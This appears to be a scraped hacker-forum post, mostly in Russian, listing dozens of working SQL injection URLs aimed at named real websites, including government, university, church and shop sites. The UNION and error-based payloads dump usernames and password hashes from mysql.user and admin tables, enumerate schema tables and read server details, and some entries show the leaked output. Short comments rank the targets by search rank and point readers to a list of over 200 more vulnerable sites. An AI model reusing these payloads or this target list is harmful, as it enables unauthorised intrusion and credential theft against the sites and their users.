http://www.blue-keeeber.com/index.php?mod=gallery&list=-219%20union%20select%201,2,3,concat%28user,0x3a,password,0x3a,file_priv%29,5,6,7,8+from+mysql.user-- PR 3 http://www.unet.edu.ve/unet2001/noticias.php?id=1947+AND+1=2+UNION+SELECT+0,concat%28user,0x3a,password%29,2+FROM+mysql.user-- PR 6 Cy10 http://www.internetprovsechny.cz/clanek.php?cid=-92+UNION+SELECT+concat%28user,0x3a,password,0x3a,File_Priv%29+from+mysql.user-- PR 5 Cy 10 http://[B]bollystic.com[/B]/Bollywood/showMovie.php?id=-564%20union%20select%201,2,group_concat%28user,0x3a,password,0x3a,File_Priv%29,4,5,6,7,8,9,10%20from%20mysql.user-- PR 2 http://www.aries.ro/index.php?lang_id=-1+AND+1=2+UNION+SELECT+group_concat%28user,0x3a,password,0x3a,File_Priv%29+FROM+mysql.user-- PR 5 Cy 10 http://www.aps.ai/newsstory.php?id=43+and+1=0%20Union%20Select+1,group_concat%28user,0x3a,password,0x3C62723E%29,3,4,5,6+from+mysql.user PR 5 http://www.asidoregon.org/newsdetail.php?id=209+AND+1=2+UNION+SELECT+0,group_concat%28user,0x3a,password%29,2,3,4,5,6,7%20from%20tblUsers-- PR 4 Cy 10
Code: http://ecommerce.diocese-kcsj.org/respectlife/view-page.php?Page_ID=-14+union+select+1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7-- Database Version: 5.0.77 Database name: 4575_diocese_kcsjorg User name: [email protected] OC type: redhat-linux-gnu
http://www.dawnnet.org/resources-news.php?id=-170%20/*!union*/%20select%201,2,3,table_name,5,6,7,8,9,0,11,12%20from%20information_schema./*!tables*/%20limit%2028,1--%201 http://www.81femmes.org/uk/news.php?id=-121%20union%20select%20version(),2,3,4--%201
http://www.alekseykalugin.ru/index.php?togive=think_read&id=17+and+1=0+union+Select+concat_ws(0x3a,username,user_password),2,3+from+akphpbb_users+limit+1,1+--+ ТИЦ : 230 http://oblmed.nsk.ru/inex1.php?action=read&id=861+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,id,username,password),18,19,20,21,22,23,24,25+From+OblBol_users+limit+0,1+--+&hr=cs_53 ТИЦ : 230 http://safes.ru/show_good.php?idtov=10066'+and+1=0+UnIon+%0A+selECt+1,2,3,concat_ws(0x3a,username,PASSWORD),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin+limit+0,1+--+ ТИЦ : 110 http://www.safeburg.ru/cgi-bin/news/view.cgi?news=92'+and+1=0+UnIon+selECt+1,concat_ws(0x3a,ID,USER,LOGIN,PSW),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+user_access+--+ ТИЦ : 80 PR: 3 http://massage-kreslo.ru/show_good.php?idtov=1061'+and+1=0+UnIon+selECt+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin+--+ http://arpion.ru/show_good.php?idtov=22312'+and+1=0+UnIon+selECt+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+admin+--+ ТИЦ : 70 http://best-carmusic.ru/show_good.php?idtov=3696'+and+1=0+UnIon+selECt+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin+--+ ТИЦ : 10 http://77tv.ru/show_good.php?idtov=220201'+and+1=0+UnIon+%0A+selECt+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin+--+ ТИЦ : 10 PR: 2 http://vremeninet.ru/show_good.php?idtov=1073'+and+1=0+UnIon+%0A+selECt+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14+from+admin+--+ ТИЦ : 20 itsell.ru/show_good.php?idtov=1101051'+and+1=0+UnIon+selECt+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin+--+ ТИЦ : 20 ---------------------------------------------- Ну а все начелось опять с корявых разроботчиков сайтов )) http://www.bornet.ru/kl.php , кто хочет поковыряйте . там более 200 бажных сайтов
http://www.visitnacogdoches.org/news.php?id=-198' union select 1,table_schema,table_name,table_rows,0x3c68723e,6,0x3c68723e,8 from information_schema.tables where table_rows>0-- 1 http://www.ummaclinic.org/news.php?id=-21' /*!union*/ select /*!concat*/(table_name),2,3,4,5,6,7,8,9 /*!from*/ information_schema.`tables` limit 38,1-- 1
Code: http://www.lisenok.ru/look.php?id=-99999+union+select+1,2,3,concat_ws%280x3a,login,password,access_level%29,5+from+users-- Тиц 60 http://www.lisenok.ru/login.php
http://www.sultanbrunei.com/news_read.asp?id=0x3a+union+select+0,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,2,3,4,5,6,7,8-- PR 3 http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,concat%28user,0x3a,password%29,4,concat%28user,0x3a,password%29,concat%28user,0x3a,password%29+FROM+mysql.user-- PR 5 http://www.habibrafiq.com/services.php?id=-22+union+select+0,1,concat%28user,0x3a,pass%29,3,4,5+from+admin PR 3 http://cooksnotebook.com/show.php?id=-999+union+select+1,2,3,concat%28user%28%29,0x3a,version%28%29,0x3a,database%28%29%29,5,6,7,8-- PR 3 http://www.ceelqaboobe.com/view.php?id=-3561%20union%20select%201,2,3,4,5,concat%28user%28%29%29,7,8,9,10-- PR 4 http://www.saladillo.gov.ar/informe_prensa_detalle.php?id=322+union+select+0,1,2,3,4,5,6,7,concat_ws%28user,0x3a,pass%29,9,10,11+from+admin P.S. Этот сайт выкладывали в PHP-inj, вот теперь скуля... PR 4 http://www.rodonorte.pt/news.php?id=20+and+0=1+union+all+select+0x31,0x32,0x33,unhex%28hex%28concat%28user%28%29,0x3a,version%28%29%29%29%29,0x35,0x36-- PR 6 Cy 10 http://clips.abusora.com/Clip.php?item_id=-25164%20union%20all%20select%201,2,concat%28user%28%29,0x3e,version%28%29,0x3e,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- PR 3 http://www.pc-boost.com/logitheque.php?idCat=11+and+0=1+union+all+select+concat%28user%28%29,database%28%29%29 P.S. Выводится белым цветом, поэтому либо выделите всю страницу, либо ищите в коде... PR 4 CY 10 http://www.intema.gov.ar/curriculum.php?id=-109+union+select+1,2,3,4,5,concat%28user,0x3a,pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+login-- PR 4 http://www.sparkle.ir/products/category.php?id=9+union+select+1,2,concat%28user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15 PR 3 http://www.denhelder.nl/index.php?menu_id=60&nieuws_id=-3792+union+all+select+1,2,concat_ws%28user%28%29,0x3a,database%28%29,0x3a%29,4,5,6,7,8,9,10,11-- PR 5 Cy 10
http://www.toxis.dk/8.0/news.php?id=40' union select 1,2,group_concat(table_name,0x3a,table_rows),4,5,6,7,8 from information_schema.tables-- 1 http://www.mesquitelocalnews.com/news.php?id=12)) or 1 group by concat((select table_name from information_schema.tables limit 17,1),floor(rand(0)*2))having min(0) or 1-- 1 http://www.melonfire.com/community/columns/trog/article.php?id=-280 /*!union*/ select 1,2,table_name,4,5,6 from information_schema.`tables`-- 1
http://www.milsetasia.org/milset/showstatic.php?id=4+and+1=0+union+select+version(),2,3,4,5,6,7&lang=ar
http://www.artsadmin.co.uk/opportunities/bursary.php?id=1 or 1 group by concat((select version()),floor(rand(0)*2))having min(0) or 1-- 1 http://www.usauctionsonline.com/propertydetail.php?id=719 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,table_name,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112 from information_schema.tables limit 28,1--
http://www.akella.com/gameclub/rating.php?id=-227+union+select+1,2,3,4,concat%28login,0x3a,pass%29,6+from+users+--+ PR 5 Cy 1700 Серьезная вроде фирма, а такая дырка...
http://www.fortemall.com/auction_details.php?auction_id=964+and+row(0,0)in(select+count(@@wait_timeout),concat((select/**/concat(0x5b,user,0x5d,0x2d,0x5b,password,0x5d)/*{file_priv:Y}*/from+mysql.user+limit+1),char(58),floor(rand(0)*2))as+z+from+information_schema.tables+group+by+z)
http://www.global.duke.edu/admin/map/details.php?id=64' union select @@version-- 1 http://forumartgallery.com/admin/view_artistdet.php?id=193' and 1=0 union select 1,concat(admin_name,0x3a,admin_pwd),3,4,5,6 from admin-- 1
JetMotoService.Ru http://jetmotoservice.ru/index.php?id_link=-182+and+1=2+union+select+1,2,3,concat(@@version,0x20,user(),0x20,database(),0x20,@@version_compile_os),5,6,7,8,9+-- 5.0.32-Debian_7etch6-log u168307_2@localhost u168307_3 pc-linux-gnu http://jetmotoservice.ru/index.php?id_link=-182+and+1=2+union+select+1,2,3,concat(user_login,0x20,user_pass),5,6,7,8,9+from+msk_users+--
http://www.jazzhouse.org/gone/lastpost2.php3?edit=-1139276241+union+select+1,2,concat%28username,0x3a,password,0x3a,id%29,4,5,6,7+from+ftp.ftp-- PR 6 Cy 30
КОММУНИСТИЧЕСКАЯ ПАРТИЯ РОССИЙСКОЙ ФЕДЕРАЦИИ http://www.kprforel.ru/?news_id=1552&menuid=2+union+select+1,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6+--+ 4.0.26-log Uwww4945S@localhost udb4945 portbld-freebsd4.10 http://www.kprf-kaliningrad.ru/?id_n=-323+and+1=2+union+select+1,2,concat(0x3a,@@version,user(),database(),@@version_compile_os),4,5+--&id=news 5.0.90-log [email protected] u52083 portbld-freebsd7.2
http://www.fssmo.ru/CompDetails.aspx?id=111 or 1 group by concat((select concat(name,0x3a,passwd) from users limit 0,1),floor(rand(0)*2))having min(0) or 1-- 1